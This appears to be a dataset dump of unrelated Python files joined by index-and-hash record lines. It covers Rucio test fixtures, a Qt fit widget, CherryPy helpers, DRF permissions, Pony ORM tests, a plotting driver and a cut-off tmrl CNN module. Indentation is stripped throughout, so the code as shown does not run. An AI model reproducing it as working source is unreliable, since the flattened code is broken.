return session_scope_prefix + _del_test_prefix(request.module.__name__.split('.')[-1]) + '-'
@pytest.fixture(scope='class')
def class_scope_prefix(request, module_scope_prefix):
if not request.cls:
return module_scope_prefix
return module_scope_prefix + _del_test_prefix(request.cls.__name__) + '-'
@pytest.fixture(scope='function')
def function_scope_prefix(request, class_scope_prefix):
return class_scope_prefix + _del_test_prefix(request.node.originalname) + '-'
@pytest.fixture(scope='session')
def vo():
if environ.get('SUITE', 'remote_dbs') != 'client':
# Server test, we can use short VO via DB for internal tests
from rucio.tests.common_server import get_vo
return get_vo()
else:
# Client-only test, only use config with no DB config
from rucio.tests.common import get_long_vo
return get_long_vo()
@pytest.fixture(scope='session')
def second_vo():
from rucio.common.config import config_get_bool
from rucio.core.vo import vo_exists, add_vo
multi_vo = config_get_bool('common', 'multi_vo', raise_exception=False, default=False)
if not multi_vo:
pytest.skip('multi_vo mode is not enabled. Running multi_vo tests in single_vo mode would result in failures.')
new_vo = 'new'
if not vo_exists(vo=new_vo):
add_vo(vo=new_vo, description='Test', email='rucio@email.com')
return new_vo
@pytest.fixture(scope='session')
def long_vo():
from rucio.tests.common import get_long_vo
return get_long_vo()
@pytest.fixture(scope='module')
def account_client():
from rucio.client.accountclient import AccountClient
return AccountClient()
@pytest.fixture(scope='module')
def replica_client():
from rucio.client.replicaclient import ReplicaClient
return ReplicaClient()
@pytest.fixture(scope='module')
def rucio_client():
from rucio.client import Client
return Client()
@pytest.fixture(scope='module')
def did_client():
from rucio.client.didclient import DIDClient
return DIDClient()
@pytest.fixture(scope='module')
def rse_client():
from rucio.client.rseclient import RSEClient
return RSEClient()
@pytest.fixture(scope='module')
def scope_client():
from rucio.client.scopeclient import ScopeClient
return ScopeClient()
@pytest.fixture(scope='module')
def dirac_client():
from rucio.client.diracclient import DiracClient
return DiracClient()
@pytest.fixture
def rest_client():
from rucio.tests.common import print_response
from flask.testing import FlaskClient
from rucio.web.rest.flaskapi.v1.main import application
class WrappedFlaskClient(FlaskClient):
def __init__(self, *args, **kwargs):
super(WrappedFlaskClient, self).__init__(*args, **kwargs)
def open(self, path='/', *args, **kwargs):
print(kwargs.get('method', 'GET'), path)
response = super(WrappedFlaskClient, self).open(path, *args, **kwargs)
try:
print_response(response)
except Exception:
traceback.print_exc()
return response
_testing = application.testing
application.testing = True
application.test_client_class = WrappedFlaskClient
with application.test_client() as client:
yield client
application.test_client_class = None
application.testing = _testing
@pytest.fixture
def auth_token(rest_client, long_vo):
from rucio.tests.common import vohdr, headers, loginhdr
auth_response = rest_client.get('/auth/userpass', headers=headers(loginhdr('root', 'ddmlab', 'secret'), vohdr(long_vo)))
assert auth_response.status_code == 200
token = auth_response.headers.get('X-Rucio-Auth-Token')
assert token
return str(token)
@pytest.fixture(scope='module')
def mock_scope(vo):
from rucio.common.types import InternalScope
return InternalScope('mock', vo=vo)
@pytest.fixture(scope='module')
def test_scope(vo):
from rucio.common.types import InternalScope
return InternalScope('test', vo=vo)
@pytest.fixture(scope='module')
def root_account(vo):
from rucio.common.types import InternalAccount
return InternalAccount('root', vo=vo)
@pytest.fixture(scope='module')
def jdoe_account(vo):
from rucio.common.types import InternalAccount
return InternalAccount('jdoe', vo=vo)
@pytest.fixture
def random_account(vo):
import random
import string
from rucio.common.types import InternalAccount
from rucio.core.account import add_account, del_account
from rucio.db.sqla import models
from rucio.db.sqla.constants import AccountType
from rucio.tests.common_server import cleanup_db_deps
account = InternalAccount(''.join(random.choice(string.ascii_uppercase) for _ in range(10)), vo=vo)
add_account(account=account, type_=AccountType.USER, email=f'{account.external}@email.com')
yield account
cleanup_db_deps(model=models.Account, select_rows_stmt=models.Account.account == account)
del_account(account)
@pytest.fixture(scope="module")
def containerized_rses(rucio_client):
"""
Detects if containerized rses for xrootd & ssh are available in the testing environment.
:return: A list of (rse_name, rse_id) tuples.
"""
from rucio.common.exception import InvalidRSEExpression
rses = []
try:
xrd_rses = [x['rse'] for x in rucio_client.list_rses(rse_expression='test_container_xrd=True')]
xrd_rses = [rucio_client.get_rse(rse) for rse in xrd_rses]
xrd_containerized_rses = [(rse_obj['rse'], rse_obj['id']) for rse_obj in xrd_rses if "xrd" in rse_obj['rse'].lower()]
xrd_containerized_rses.sort()
rses.extend(xrd_containerized_rses)
ssh_rses = [x['rse'] for x in rucio_client.list_rses(rse_expression='test_container_ssh=True')]
ssh_rses = [rucio_client.get_rse(rse) for rse in ssh_rses]
ssh_containerized_rses = [(rse_obj['rse'], rse_obj['id']) for rse_obj in ssh_rses if "ssh" in rse_obj['rse'].lower()]
ssh_containerized_rses.sort()
rses.extend(ssh_containerized_rses)
except InvalidRSEExpression as invalid_rse_expression:
print("{ex}. Note that containerized RSEs will not be available in non-containerized test environments"
.format(ex=invalid_rse_expression))
traceback.print_exc()
return rses
@pytest.fixture
def rse_factory(request, vo, function_scope_prefix):
from .temp_factories import TemporaryRSEFactory
session = None
if 'db_session' in request.fixturenames:
session = request.getfixturevalue('db_session')
with TemporaryRSEFactory(vo=vo, name_prefix=function_scope_prefix, db_session=session) as factory:
yield factory
@pytest.fixture(scope="class")
def rse_factory_unittest(request, vo, class_scope_prefix):
"""
unittest classes can get access to rse_factory fixture via this fixture
"""
from .temp_factories import TemporaryRSEFactory
with TemporaryRSEFactory(vo=vo, name_prefix=class_scope_prefix) as factory:
request.cls.rse_factory = factory
yield factory
@pytest.fixture
def did_factory(request, vo, mock_scope, function_scope_prefix, file_factory, root_account):
from .temp_factories import TemporaryDidFactory
session = None
if 'db_session' in request.fixturenames:
session = request.getfixturevalue('db_session')
with TemporaryDidFactory(vo=vo, default_scope=mock_scope, name_prefix=function_scope_prefix, file_factory=file_factory,
default_account=root_account, db_session=session) as factory:
yield factory
@pytest.fixture
def file_factory(tmp_path_factory):
from .temp_factories import TemporaryFileFactory
with TemporaryFileFactory(pytest_path_factory=tmp_path_factory) as factory:
yield factory
@pytest.fixture
def scope_factory():
from rucio.common.utils import generate_uuid
from rucio.core.scope import add_scope
from rucio.common.types import InternalAccount, InternalScope
def create_scopes(vos, account_name=None):
scope_uuid = str(generate_uuid()).lower()[:16]
scope_name = 'shr_%s' % scope_uuid
created_scopes = []
for vo in vos:
scope = InternalScope(scope_name, vo=vo)
add_scope(scope, InternalAccount(account_name if account_name else 'root', vo=vo))
created_scopes.append(scope)
return scope_name, created_scopes
return create_scopes
class _TagFactory:
def __init__(self, prefix):
self.prefix = prefix
self.index = 0
def new_tag(self):
self.index += 1
return f'{self.prefix}-{self.index}'
@pytest.fixture
def tag_factory(function_scope_prefix):
return _TagFactory(prefix=f'{function_scope_prefix}{"".join(choice(ascii_uppercase) for _ in range(6))}'.replace('_', '-'))
@pytest.fixture(scope='class')
def tag_factory_class(class_scope_prefix):
return _TagFactory(prefix=f'{class_scope_prefix}{"".join(choice(ascii_uppercase) for _ in range(6))}'.replace('_', '-'))
@pytest.fixture
def db_session():
from rucio.db.sqla import session
db_session = session.get_session()
yield db_session
db_session.commit()
db_session.close()
def __get_fixture_param(request):
fixture_param = getattr(request, "param", None)
if not fixture_param:
# Parametrize support is incomplete for legacy unittest test cases
# Manually retrieve the parameters from the list of marks:
mark = next(iter(filter(lambda m: m.name == 'parametrize', request.instance.pytestmark)), None)
if mark:
fixture_param = mark.args[1][0]
return fixture_param
def __create_in_memory_db_table(name, *columns, **kwargs):
"""
Create an in-memory temporary table using the sqlite memory driver.
Make sqlalchemy aware of that table by registering it via a
declarative base.
"""
import datetime
from sqlalchemy import Column, DateTime, CheckConstraint
from sqlalchemy.pool import StaticPool
from sqlalchemy.schema import Table
from sqlalchemy.orm import registry
from rucio.db.sqla.models import ModelBase
from rucio.db.sqla.session import get_maker, create_engine
engine = create_engine('sqlite://', connect_args={'check_same_thread': False}, poolclass=StaticPool)
# Create a class which inherits from ModelBase. This will allow us to use the rucio-specific methods like .save()
DeclarativeObj = type('DeclarativeObj{}'.format(name), (ModelBase,), {})
# Create a new declarative base and map the previously created object into the base
mapper_registry = registry()
InMemoryBase = mapper_registry.generate_base(name='InMemoryBase{}'.format(name))
table_args = tuple(columns) + tuple(kwargs.get('table_args', ())) + (
Column("created_at", DateTime, default=datetime.datetime.utcnow),
Column("updated_at", DateTime, default=datetime.datetime.utcnow, onupdate=datetime.datetime.utcnow),
CheckConstraint('CREATED_AT IS NOT NULL', name=name.upper() + '_CREATED_NN'),
CheckConstraint('UPDATED_AT IS NOT NULL', name=name.upper() + '_UPDATED_NN'),
)
table = Table(
name,
InMemoryBase.metadata,
*table_args
)
mapper_registry.map_imperatively(DeclarativeObj, table)
# Performa actual creation of the in-memory table
InMemoryBase.metadata.create_all(engine)
# Register the new table with the associated engine into the sqlalchemy sessionmaker
# In theory, this code must be protected by rucio.db.scla.session._LOCK, but this code will be executed
# during test case initialization, so there is no risk here to have concurrent calls from within the
# same process
senssionmaker = get_maker()
senssionmaker.kw.setdefault('binds', {}).update({DeclarativeObj: engine})
return DeclarativeObj
@pytest.fixture
def message_mock():
"""
Fixture which overrides the Message table with a private instance
"""
from unittest import mock
from sqlalchemy import Column
from rucio.common.utils import generate_uuid
from rucio.db.sqla.models import String, PrimaryKeyConstraint, CheckConstraint, Text, Index, GUID
InMemoryMessage = __create_in_memory_db_table(
'message_' + generate_uuid(),
Column('id', GUID(), default=generate_uuid),
Column('event_type', String(256)),
Column('payload', String(4000)),
Column('payload_nolimit', Text),
Column('services', String(256)),
table_args=(PrimaryKeyConstraint('id', name='MESSAGES_ID_PK'),
CheckConstraint('EVENT_TYPE IS NOT NULL', name='MESSAGES_EVENT_TYPE_NN'),
CheckConstraint('PAYLOAD IS NOT NULL', name='MESSAGES_PAYLOAD_NN'),
Index('MESSAGES_SERVICES_IDX', 'services', 'event_type'))
)
with mock.patch('rucio.core.message.Message', new=InMemoryMessage):
yield
@pytest.fixture
def core_config_mock(request):
"""
Fixture to allow having per-test core.config tables without affecting the other parallel tests.
This override works only in tests which use core function calls directly, not in the ones working
via the API, because the normal config table is not touched and the rucio instance answering API
calls is not aware of this mock.
This fixture acts by creating a new copy of the "config" sql table using the :memory: sqlite engine.
Accesses to the "models.Config" table are then redirected to this temporary table via mock.patch().
"""
from unittest import mock
from sqlalchemy import Column
from rucio.common.utils import generate_uuid
from rucio.db.sqla.models import String, PrimaryKeyConstraint
from rucio.db.sqla.session import get_session
# Get the fixture parameters
table_content = []
params = __get_fixture_param(request)
if params:
table_content = params.get("table_content", table_content)
InMemoryConfig = __create_in_memory_db_table(
'configs_' + generate_uuid(),
Column('section', String(128)),
Column('opt', String(128)),
Column('value', String(4000)),
table_args=(PrimaryKeyConstraint('section', 'opt', name='CONFIGS_PK'),),
)
# Fill the table with the requested mock data
session = get_session()()
for section, option, value in (table_content or []):
InMemoryConfig(section=section, opt=option, value=value).save(flush=True, session=session)
session.commit()
with mock.patch('rucio.core.config.models.Config', new=InMemoryConfig):
yield
@pytest.fixture
def file_config_mock(request):
"""
Fixture which allows to have an isolated in-memory configuration file instance which
is not persisted after exiting the fixture.
This override works only in tests which use config calls directly, not in the ones working
via the API, as the server config is not changed.
"""
from unittest import mock
from rucio.common.config import Config, config_set, config_has_section, config_add_section
# Get the fixture parameters
overrides = []
params = __get_fixture_param(request)
if params:
overrides = params.get("overrides", overrides)
parser = Config().parser
with mock.patch('rucio.common.config.get_config', side_effect=lambda: parser):
for section, option, value in (overrides or []):
if not config_has_section(section):
config_add_section(section)
config_set(section, option, value)
yield
@pytest.fixture
def caches_mock(request):
"""
Fixture which overrides the different internal caches with in-memory ones for the duration
of a particular test.
This override works only in tests which use core function calls directly, not in the ones
working via API.
The fixture acts by by mock.patch the REGION object in the provided list of modules to mock.
"""
from unittest import mock
from contextlib import ExitStack
from dogpile.cache import make_region
caches_to_mock = []
expiration_time = 600
params = __get_fixture_param(request)
if params:
caches_to_mock = params.get("caches_to_mock", caches_to_mock)
expiration_time = params.get("expiration_time", expiration_time)
with ExitStack() as stack:
mocked_caches = []
for module in caches_to_mock:
region = make_region().configure('dogpile.cache.memory', expiration_time=expiration_time)
stack.enter_context(mock.patch(module, new=region))
mocked_caches.append(region)
yield mocked_caches
@pytest.fixture
def metrics_mock():
"""
Overrides the prometheus metric registry and allows to verify if the desired
prometheus metrics were correctly recorded.
"""
from unittest import mock
from prometheus_client import CollectorRegistry, values
with mock.patch('rucio.core.monitor.REGISTRY', new=CollectorRegistry()) as registry, \
mock.patch('rucio.core.monitor.COUNTERS', new={}), \
mock.patch('rucio.core.monitor.GAUGES', new={}), \
mock.patch('rucio.core.monitor.TIMINGS', new={}), \
mock.patch('prometheus_client.values.ValueClass', new=values.MutexValue):
yield registry
|
5,668 | aa51b2d4bfe4051f3302d14cf2123a3881a8a2e3 | import cpt_tools
from gui_helpers.gui_config import *
chisqr_str = '\u03c72'
mu_str = '\u03bc'
sigma_str = '\u03c3'
class FitWidget( object ) :
def __init__( self, plotter_widget, analyzer = None ) :
self.plotter_widget = plotter_widget
self.plotter = plotter_widget.plotter
self.hists = self.plotter.all_hists
self.layout = QVBoxLayout()
params_labels = [ 'A', mu_str, sigma_str, chisqr_str ]
self.num_params = len( params_labels )
h_labels = [ '', '', 'Left', 'Right' ]
h_labels.extend( params_labels )
v_labels = [ x.title for x in self.hists ]
nrows = len( v_labels )
ncols = len( h_labels )
self.table = QTableWidget( nrows, ncols )
self.table.setMinimumWidth( 400 )
self.table.setMinimumHeight(100)
# self.table.setMaximumHeight(200)
# size_policy = QSizePolicy( QSizePolicy.Maximum,
# QSizePolicy.Maximum )
# self.table.setSizePolicy( size_policy )
self.table.horizontalHeader().setSectionResizeMode( QHeaderView.Stretch )
self.table.verticalHeader().setSectionResizeMode( QHeaderView.Stretch )
# header = self.table.horizontalHeader()
# header.setSectionResizeMode( 0, QHeaderView.Stretch )
# for j in range( 1, len( h_labels ) ) :
# header.setSectionResizeMode( j, QHeaderView.ResizeToContents )
self.table.setHorizontalHeaderLabels( h_labels )
self.table.setVerticalHeaderLabels( v_labels )
self.bounds_entries = []
self.params_labels = []
self.fit_buttons = []
self.delete_buttons = []
for i in range( len( self.hists ) ) :
self.bounds_entries.append( [ QLineEdit(), QLineEdit() ] )
self.params_labels.append( [ QLabel() for i in range( self.num_params ) ] )
self.fit_buttons.append( QPushButton( 'Fit' ) )
self.delete_buttons.append( QPushButton( 'Delete' ) )
self.fit_buttons[i].clicked.connect( lambda state, a=i : self.fit_button_clicked( a ) )
self.delete_buttons[i].clicked.connect( lambda state, a=i : self.delete_button_clicked( a ) )
# self.fit_buttons[i].clicked.emit()
self.table.setCellWidget( i, 0, self.fit_buttons[i] )
self.table.setCellWidget( i, 1, self.delete_buttons[i] )
self.table.setCellWidget( i, 2, self.bounds_entries[i][0] )
self.table.setCellWidget( i, 3, self.bounds_entries[i][1] )
for j in range( self.num_params ) :
self.table.setCellWidget( i, 4 + j, self.params_labels[i][j] )
# self.left_x_bound_entry.setMaximumWidth( PLOTTER_WIDGET_QLINEEDIT_WIDTH )
# self.right_x_bound_entry.setMaximumWidth( PLOTTER_WIDGET_QLINEEDIT_WIDTH )
# self.layout.setSpacing(0)
# self.layout.addLayout( label_layout )
self.layout.addWidget( self.table )
def fit_button_clicked( self, i ) :
print( self.bounds_entries[i][0].text() )
try :
left_x_bound = float( self.bounds_entries[i][0].text() )
right_x_bound = float( self.bounds_entries[i][1].text() )
except :
print( 'WARNING: please specify bounds for fit' )
return
bounds = [ left_x_bound, right_x_bound ]
fit = self.hists[i].apply_fit( bounds )
if fit is None :
print( 'ERROR: fit failed' )
return
self.set_fit_params( fit, i )
self.plotter.update_all()
self.plotter_widget.reload_visualization_params()
return fit
def set_fit_params( self, fit, i ) :
if fit is None :
for j in range( self.num_params ) :
self.params_labels[i][j].setText( '' )
return
params = fit.params
params_errors = fit.params_errors
redchisqr = fit.redchisqr
# params, params_errors, redchisqr = fit
if params_errors is not None :
labels = [ '%.1f\u00b1%.1f' % ( params[j], params_errors[j] ) for j in range( len(params) ) ]
else :
labels = [ '%.1f' % params[j] for j in range( len(params) ) ]
labels.append( '%.1f' % redchisqr )
for j in range( len(params) + 1 ) :
self.params_labels[i][j].setText( labels[j] )
def delete_button_clicked( self, i ) :
self.hists[i].remove_fit()
|
5,669 | dc28d8aa17347f07041ae218bbe4e1b0add27c24 | import cherrypy
import config
try:
from simplejson import json
except ImportError:
import json
import routes
import urllib
import re
def redirect(url, status=None):
"""Raise a redirect to the specified address.
"""
raise cherrypy.HTTPRedirect(url, status)
def require_method(*allowed_methods):
allowed_methods = list(allowed_methods)
if "GET" in allowed_methods:
if "HEAD" not in allowed_methods:
allowed_methods.append("HEAD")
allowed_methods.sort()
if cherrypy.request.method not in allowed_methods:
cherrypy.response.headers['Allow'] = ", ".join(allowed_methods)
raise cherrypy.HTTPError(405)
def gonext():
"""Redirect to the url specified by the "next" parameter, if there is one.
"""
next = cherrypy.request.params.get('next', '')
if next != '':
redirect(next)
def url(*args, **kwargs):
"""Get the url for a given route.
"""
if len(args) == 0 and len(kwargs) == 0:
return cherrypy.url()
# First read the old args
newkwargs = dict(
(k, v[3:]) for (k, v) in kwargs.iteritems()
if v is not None and k.startswith('old')
)
# Apply neither new nor old args
for (k, v) in kwargs.iteritems():
if k.startswith('new') or k.startswith('old'):
continue
if v is None:
try:
del newkwargs[k]
except KeyError: pass
else:
newkwargs[k] = v
# Apply new args
for (k, v) in kwargs.iteritems():
if k[:3] != 'new':
continue
k = k[3:]
if v is None:
try:
del newkwargs[k]
except KeyError: pass
else:
newkwargs[k] = v
if len(args) > 0 and args[0] == 'static':
return config.STATIC_ASSETS_URL + '/'.join(args[1:])
return cherrypy.url(routes.url_for(*args, **newkwargs))
def queryparams(*args, **kwargs):
"""Encode a set of arguments as query parameters.
"""
args = dict(args)
args.update(kwargs)
return urllib.urlencode(args)
def get_or_404(cls, id):
try:
return cls.objects.get(unicode(id))
except KeyError:
raise cherrypy.NotFound
def locked(fn):
"""Decorator to ensure that the mutex is locked while calling a method.
The method's object must have a mutex in a property named "mutex".
"""
def locked_method(self, *args, **kwargs):
self.mutex.acquire()
try:
return fn(self, *args, **kwargs)
finally:
self.mutex.release()
return locked_method
def get_user():
from apps.store.models import User
try:
user = User.objects.get(u'_')
except KeyError:
user = User(None)
user.id = u'_'
User.objects.set(user)
return user
def get_settings():
from apps.store.models import Settings
try:
settings = Settings.objects.get(u'_')
except KeyError:
settings = Settings(None)
settings.id = u'_'
settings.set_roots(config.default_media_roots)
Settings.objects.set(settings)
return settings
def listify(val):
"""Convert a value, as found in cherrypy parameters, into a list.
"""
if isinstance(val, basestring):
return [val]
if hasattr(val, '__iter__'):
return list(val)
return [val]
def listify_values(params):
"""Return a copy of a dict with values which were strings converted to
lists.
"""
return dict((k, listify(v)) for (k, v) in params.iteritems())
def getparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single item, or None if not
supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0: return v[0]
return default
def getintparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single integer item, or None if
not supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0: return int(v[0])
return default
def getparamlist(name, default=[], stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
Returns a list of values.
"""
if params is None:
params = cherrypy.request.params
v = params.get("new" + name, None)
if v is None:
v = params.get(name, None)
if v is None:
v = params.get("old" + name, None)
if v is None:
return default
v = listify(v)
if stash is not None:
stash[str(name)] = v
return v
def getorderparam(name):
"""Get the sequence of numbers stored in a parameter.
The parameter should contain the numbers separated by commas.
If invalid entries are found, raises an HTTP 400 error.
"""
for num in cherrypy.request.params.get(name, '').split(','):
if num.strip() == '':
continue
try:
yield int(num)
except ValueError:
raise cherrypy.HTTPError(400)
def jsonresp(value):
"""Return a json formatted value, and set appropriate headers.
"""
body = (json.dumps(value),)
cherrypy.response.headers['Content-Type'] = 'application/json'
return body
def slugify(value):
import unicodedata
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\w\s\.-]', '_', value).strip().lower())
return re.sub('[-\s]+', '-', value)
|
5,670 | 325770130473153d092d3058587e9666625e12d0 | # coding=utf-8
"""
@Author: Freshield
@Contact: yangyufresh@163.com
@File: a1_test_call.py
@Time: 2021-01-20 17:40
@Last_update: 2021-01-20 17:40
@Desc: None
@==============================================@
@ _____ _ _ _ _ @
@ | __|___ ___ ___| |_|_|___| |_| | @
@ | __| _| -_|_ -| | | -_| | . | @
@ |__| |_| |___|___|_|_|_|___|_|___| @
@ Freshield @
@==============================================@
"""
import requests
import json
url = 'https://www.baidu.com'
url = 'http://www.baidu.com/s?wd=python'
r = requests.get(url)
print(r.url)
print(r.text)
url = 'http://www.baidu.com/s'
params = {'wd': 'python'}
r = requests.get(url, params=params)
print(r.text)
print(r.url)
data = {'key1': 'value1', 'key2': 'value2'}
data = json.dumps(data)
r = requests.post('https://www.baidu.com', data=data)
print(r.text)
print(r) |
5,671 | 7f2ffa653486d000c9eee0087fc1e6ca0c84003c | class Solution:
def jump(self, nums: List[int]) -> int:
if len(nums) < 2: return 0
jump = 1
curr_max = max_reach = nums[0]
for i in range(1, len(nums)):
if max_reach >= len(nums) - 1:
return jump
curr_max = max(curr_max, i + nums[i])
if i == max_reach:
max_reach = curr_max
jump += 1
return jump
# TC: O(n)
# n is the len(nums), as we only scan the list once
# SC: O(1)
# we only init 3 variables, thus space is constant
|
5,672 | 33c39b098cb9d3368b8f74a7433e0943fe252da5 | import unittest, warnings
from pony.orm import *
from pony.orm import core
from pony.orm.tests.testutils import raises_exception
db = Database('sqlite', ':memory:')
class Person(db.Entity):
id = PrimaryKey(int)
name = Required(str)
tel = Optional(str)
db.generate_mapping(check_tables=False)
with db_session:
db.execute("""
create table Person(
id int primary key,
name text,
tel text
)
""")
warnings.simplefilter('error', )
class TestValidate(unittest.TestCase):
@db_session
def setUp(self):
db.execute('delete from Person')
registry = getattr(core, '__warningregistry__', {})
for key in list(registry):
if type(key) is not tuple: continue
text, category, lineno = key
if category is DatabaseContainsIncorrectEmptyValue:
del registry[key]
@db_session
def test_1a(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore', DatabaseContainsIncorrectEmptyValue)
db.insert('Person', id=1, name='', tel='111')
p = Person.get(id=1)
self.assertEqual(p.name, '')
@raises_exception(DatabaseContainsIncorrectEmptyValue,
'Database contains empty string for required attribute Person.name')
@db_session
def test_1b(self):
with warnings.catch_warnings():
warnings.simplefilter('error', DatabaseContainsIncorrectEmptyValue)
db.insert('Person', id=1, name='', tel='111')
p = Person.get(id=1)
@db_session
def test_2a(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore', DatabaseContainsIncorrectEmptyValue)
db.insert('Person', id=1, name=None, tel='111')
p = Person.get(id=1)
self.assertEqual(p.name, None)
@raises_exception(DatabaseContainsIncorrectEmptyValue,
'Database contains NULL for required attribute Person.name')
@db_session
def test_2b(self):
with warnings.catch_warnings():
warnings.simplefilter('error', DatabaseContainsIncorrectEmptyValue)
db.insert('Person', id=1, name=None, tel='111')
p = Person.get(id=1)
if __name__ == '__main__':
unittest.main()
|
5,673 | 2bccfba2448059a41185b117b224813e344b50f8 | from simple_avk.AVK import SimpleAVK
from simple_avk.exceptions import MethodError, LongpollError
|
5,674 | 4549f26cf8051535f9d3486d111fc7afe7514dea | from rest_framework import permissions
class AdminUrlUserPermission(permissions.BasePermission):
def has_permission(self, request, view):
return (request.user.is_authenticated
and (request.user.role == 'admin'
or request.user.is_superuser))
def has_object_permission(self, request, view, obj):
return (request.user.role == 'admin'
or request.user.is_superuser)
class ReadOnly(permissions.BasePermission):
def has_permission(self, request, view):
return request.method in permissions.SAFE_METHODS
class AuthorModeratorAdminOrReadOnly(permissions.BasePermission):
def has_permission(self, request, view):
is_safe = request.method in permissions.SAFE_METHODS
is_auth = request.user.is_authenticated
return is_safe or is_auth
def has_object_permission(self, request, view, obj):
is_safe = request.method in permissions.SAFE_METHODS
is_author = obj.author == request.user
is_privileged = None
if request.user.is_authenticated:
is_privileged = request.user.role in ('moderator', 'admin')
return is_author or is_safe or is_privileged
|
5,675 | 7537deb4560e880365b23a99584d0b1f8fa3daf4 | from click.testing import CliRunner
from apitest.actions.cli import cli
def test_sendto_cli_runs_ok():
runner = CliRunner()
result = runner.invoke(cli, ["sendto"])
assert result.exit_code == 0
|
5,676 | 9101fc5b8ba04a1b72e0c79d5bf3e4118e1bad75 | #! /usr/bin/python
import math
import sys
import os
import subprocess
#PTYPES = [ "eth_ip_udp_head_t", "ip_udp_head_t", "eth_32ip_udp_head_t", "eth_64ip_udp_head_t", "eth64_64ip64_64udp_head_t", "eth6464_64ip64_64udp_head_t" ]
#PTYPES = [ "eth_ip_udp_head_t", "eth_32ip_udp_head_t", "eth_64ip_udp_head_t", "eth64_64ip64_64udp_head_t", "eth6464_64ip64_64udp_head_t" ]
PTYPE = "volatile eth_ip_udp_head_t"
#PTYPE = "volatile eth6464_64ip64_64udp_head_t"
def log_out(out):
print(out[:-1])
def run_proc(p, wait):
if not wait:
pid = os.fork()
if pid != 0:
return
proc = subprocess.Popen(p, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc.wait()
log_out("STDERR -- %s\n" % p)
for line in proc.stderr:
log_out(line)
log_out("STDOUT -- %s\n" % p)
for line in proc.stdout:
log_out(line)
if not wait:
sys.exit(0)
args = []
for i in [1,10] + \
range(100,1000,200) + \
range(1000,10 *1000, 1000) + \
range(10 * 1000,100 * 1000, 20 * 1000) + \
range(100 * 1000, 1000 * 1000, 200 * 1000) + \
range(1000 * 1000, 5 * 1000 * 1000, 2000 * 1000):
packet_count = i
outdir = "experiments/baseline"
test_id = "%010i" % (packet_count)
args.append( "%s/%s.stats %4.2fMB" % (outdir, test_id, i * 2048 / 1024.0 / 1024.0))
cmd = "./plot_fast_net.py RD %s baseline-rd.pdf" % (" ".join(args) )
print cmd
run_proc(cmd,False)
cmd = "./plot_fast_net.py WR %s baseline-wr.pdf" % (" ".join(args) )
print cmd
run_proc(cmd,True)
cmd = "./plot_fast_net.py APRD %s baseline-aprd.pdf" % (" ".join(args) )
print cmd
run_proc(cmd,False)
cmd = "./plot_fast_net.py APWR %s baseline-apwr.pdf" % (" ".join(args) )
print cmd
run_proc(cmd,True)
|
5,677 | 6f6d3fbb9a6a118e0f4026a7f9054b90b8cf2fca | # from dataclasses import InitVar, dataclass
# standard library imports
from math import floor
# third-party imports
import gym
import torch
from torch.nn import Conv2d, Linear, MaxPool2d, Module, ModuleList, ReLU, Sequential
from torch.nn import functional as F
# local imports
from tmrl.nn import TanhNormalLayer
from tmrl.sac_models import ActorModule, MlpActionValue, SacLinear, prod
import logging
# === Trackmania =======================================================================================================
def num_flat_features(x):
size = x.size()[1:]
num_features = 1
for s in size:
num_features *= s
return num_features
def conv2d_out_dims(conv_layer, h_in, w_in):
h_out = floor((h_in + 2 * conv_layer.padding[0] - conv_layer.dilation[0] * (conv_layer.kernel_size[0] - 1) - 1) / conv_layer.stride[0] + 1)
w_out = floor((w_in + 2 * conv_layer.padding[1] - conv_layer.dilation[1] * (conv_layer.kernel_size[1] - 1) - 1) / conv_layer.stride[1] + 1)
return h_out, w_out
class Net(Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = Conv2d(3, 8, (8, 8))
self.conv2 = Conv2d(8, 16, (4, 4))
self.conv3 = Conv2d(16, 32, (3, 3))
self.conv4 = Conv2d(32, 64, (3, 3))
self.fc1 = Linear(672, 253)
def forward(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (4, 4))
x = F.max_pool2d(F.relu(self.conv2(x)), (4, 4))
x = F.max_pool2d(F.relu(self.conv3(x)), (4, 4))
x = x.view(-1, num_flat_features(x))
x = F.relu(self.fc1(x))
return x
class DeepmindCNN(Module):
def __init__(self, h_in, w_in, channels_in):
super(DeepmindCNN, self).__init__()
self.h_out, self.w_out = h_in, w_in
self.conv1 = Conv2d(in_channels=channels_in, out_channels=32, kernel_size=(8, 8), stride=4, padding=0, dilation=1, bias=True, padding_mode='zeros')
self.h_out, self.w_out = conv2d_out_dims(self.conv1, self.h_out, self.w_out)
self.conv2 = Conv2d(in_channels=32, out_channels=64, kernel_size=(4, 4), stride=2, padding=0, dilation=1, bias=True, padding_mode='zeros')
self.h_out, self.w_out = conv2d_out_dims(self.conv2, self.h_out, self.w_out)
self.conv3 = Conv2d(in_channels=64, out_channels=64, kernel_size=(3, 3), stride=1, padding=0, dilation=1, bias=True, padding_mode='zeros')
self.h_out, self.w_out = conv2d_out_dims(self.conv3, self.h_out, self.w_out)
self.out_channels = self.conv3.out_channels
self.flat_features = self.out_channels * self.h_out * self.w_out
logging.debug(f" h_in:{h_in}, w_in:{w_in}, h_out:{self.h_out}, w_out:{self.w_out}, flat_features:{self.flat_features}")
def forward(self, x):
logging.debug(f" forward, shape x :{x.shape}")
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
flat_features = num_flat_features(x)
assert flat_features == self.flat_features, f"x.shape:{x.shape}, flat_features:{flat_features}, self.out_channels:{self.out_channels}, self.h_out:{self.h_out}, self.w_out:{self.w_out}"
x = x.view(-1, flat_features)
return x
class BigCNN(Module):
def __init__(self, h_in, w_in, channels_in):
super(BigCNN, self).__init__()
self.h_out, self.w_out = h_in, w_in
self.conv1 = Conv2d(channels_in, 64, 8, stride=2)
self.h_out, self.w_out = conv2d_out_dims(self.conv1, self.h_out, self.w_out)
self.conv2 = Conv2d(64, 64, 4, stride=2)
